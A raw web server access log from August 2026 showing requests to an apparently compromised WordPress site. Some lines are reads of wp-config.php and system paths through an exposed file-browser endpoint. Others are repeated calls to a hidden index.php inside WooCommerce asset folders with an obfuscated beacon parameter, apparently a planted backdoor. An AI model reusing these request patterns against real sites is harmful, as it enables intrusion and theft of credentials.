74.7.241.10 - - [02/Aug/2026:01:49:57 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory6 HTTP/1.1" 200 3506 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:50:00 +0200] "GET /shops/encyst/b0a3t9h6o1l5i7t2e726?fileloc=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-config.php&path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket HTTP/1.1" 200 4483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:50:01 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory1 HTTP/1.1" 200 3505 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:50:03 +0200] "GET /irremediable/d0i4a8l4e4c1t3i9c5a5lly?fileloc=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket%2Fwp-blog-header.php&path=%2Fvar%2Fwww%2Fsopnonill_st_usr%2Fdata%2Fwww%2Fsopnonill.store%2Fjacket HTTP/1.1" 200 3095 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:50:04 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory9/subsystem HTTP/1.1" 200 3323 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:50:06 +0200] "GET /?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging%2F_musllinux.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging HTTP/1.1" 200 3961 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:50:07 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory6/subsystem HTTP/1.1" 200 3323 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:47:48 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633313636382p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383036382q6538646562306537393963646537306364343533356632613362306336376533222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:01:50:09 +0200] "GET /?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging%2F_manylinux.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging HTTP/1.1" 200 6130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:50:10 +0200] "GET /?fileloc=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory5/phys_device&path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory5 HTTP/1.1" 200 2809 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:50:12 +0200] "GET /?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging%2F_elffile.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging HTTP/1.1" 200 3975 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:50:13 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory5/subsystem HTTP/1.1" 200 3321 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:50:15 +0200] "GET /?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging%2Frequirements.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging HTTP/1.1" 200 3811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:50:16 +0200] "GET /?fileloc=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory2/phys_index&path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory2 HTTP/1.1" 200 2810 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:50:18 +0200] "GET /?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging%2Fpy.typed&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging HTTP/1.1" 200 2735 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:50:19 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory2/subsystem HTTP/1.1" 200 3320 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:50:21 +0200] "GET /?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging%2Fmarkers.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging HTTP/1.1" 200 5539 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:50:22 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory0/subsystem HTTP/1.1" 200 3324 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:50:24 +0200] "GET /?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging%2Fmetadata.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fpackaging HTTP/1.1" 200 12230 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:50:25 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory8/subsystem HTTP/1.1" 200 3323 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:50:28 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/subsystem HTTP/1.1" 200 3322 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:48:10 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633313639302p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383039302q6365326666326636613132663639666635363665383032636335373862373461222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:50:31 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory8/subsystem HTTP/1.1" 200 3323 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:50:33 +0200] "GET /?path=%2F%2Fsys%2Fmodule%2Fdm_multipath%2Fparameters HTTP/1.1" 200 3072 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:50:35 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory1/subsystem HTTP/1.1" 200 3322 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:50:35 +0200] "GET /?path=%2F%2Fsys%2Fmodule%2Fdebug_core HTTP/1.1" 200 3119 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:50:38 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory9/subsystem/devices HTTP/1.1" 200 4926 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory9/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:01:50:38 +0200] "GET /?path=%2F%2Fsys%2Fmodule%2Fjoydev%2Fnotes HTTP/1.1" 200 3105 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.122 - - [02/Aug/2026:01:50:41 +0200] "GET /?path=%2F%2Fopt%2Ffphp%2Finclude%2Fphp%2Fsapi%2Fcli HTTP/1.1" 200 3066 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:01:50:41 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory6/subsystem/drivers HTTP/1.1" 200 2873 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory6/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:50:44 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory9/subsystem/drivers HTTP/1.1" 200 2873 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory9/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:50:47 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory5/subsystem/drivers HTTP/1.1" 200 2871 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory5/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:50:50 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory5/subsystem/devices HTTP/1.1" 200 4925 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory5/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:48:32 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633313731322p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383131322q3361383166663939363937663831323465353631333163356562326664346261222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:50:53 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory2/subsystem/devices HTTP/1.1" 200 4921 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory2/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:50:56 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory0/subsystem/drivers HTTP/1.1" 200 2874 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory0/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:50:59 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory8/subsystem/devices HTTP/1.1" 200 4927 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory8/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:02 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory8/subsystem/drivers HTTP/1.1" 200 2872 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory8/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:06 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory8/subsystem/devices HTTP/1.1" 200 4927 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory8/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:09 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory1/subsystem/devices HTTP/1.1" 200 4926 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory1/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:12 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory1/subsystem/drivers HTTP/1.1" 200 2872 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory1/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:48:54 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633313733342p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383133342q6463343535346539316164383365633034386130656265666463353231633435222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:51:15 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory0/subsystem/devices HTTP/1.1" 200 4926 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory0/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:18 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/subsystem/drivers HTTP/1.1" 200 2872 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:21 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory8/subsystem/drivers HTTP/1.1" 200 2873 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory8/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:24 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory2/subsystem/drivers HTTP/1.1" 200 2867 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory2/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:28 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory6/subsystem HTTP/1.1" 200 3321 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:31 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory1/subsystem HTTP/1.1" 200 3324 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:34 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory6/subsystem/devices HTTP/1.1" 200 4927 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory6/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:49:16 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633313735362p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383135362q3761653065396666646338373730343462626435393233653966303337323831222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:51:37 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/subsystem/devices HTTP/1.1" 200 4926 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:40 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5/power HTTP/1.1" 200 3469 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:43 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory5/power HTTP/1.1" 200 3467 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:47 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory0/power HTTP/1.1" 200 3470 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:50 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory1/power HTTP/1.1" 200 3467 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:53 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory9/power HTTP/1.1" 200 3469 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:51:56 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory8/power HTTP/1.1" 200 3469 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:01:49:38 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633313737382p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383137382q6536313638646238303661373762646461356439353966643535646265326638222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:01:51:59 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory6/power HTTP/1.1" 200 3469 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:02 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory6/subsystem/drivers HTTP/1.1" 200 2871 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory6/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.10 - - [02/Aug/2026:01:52:06 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory1/subsystem/drivers HTTP/1.1" 200 2874 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory1/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
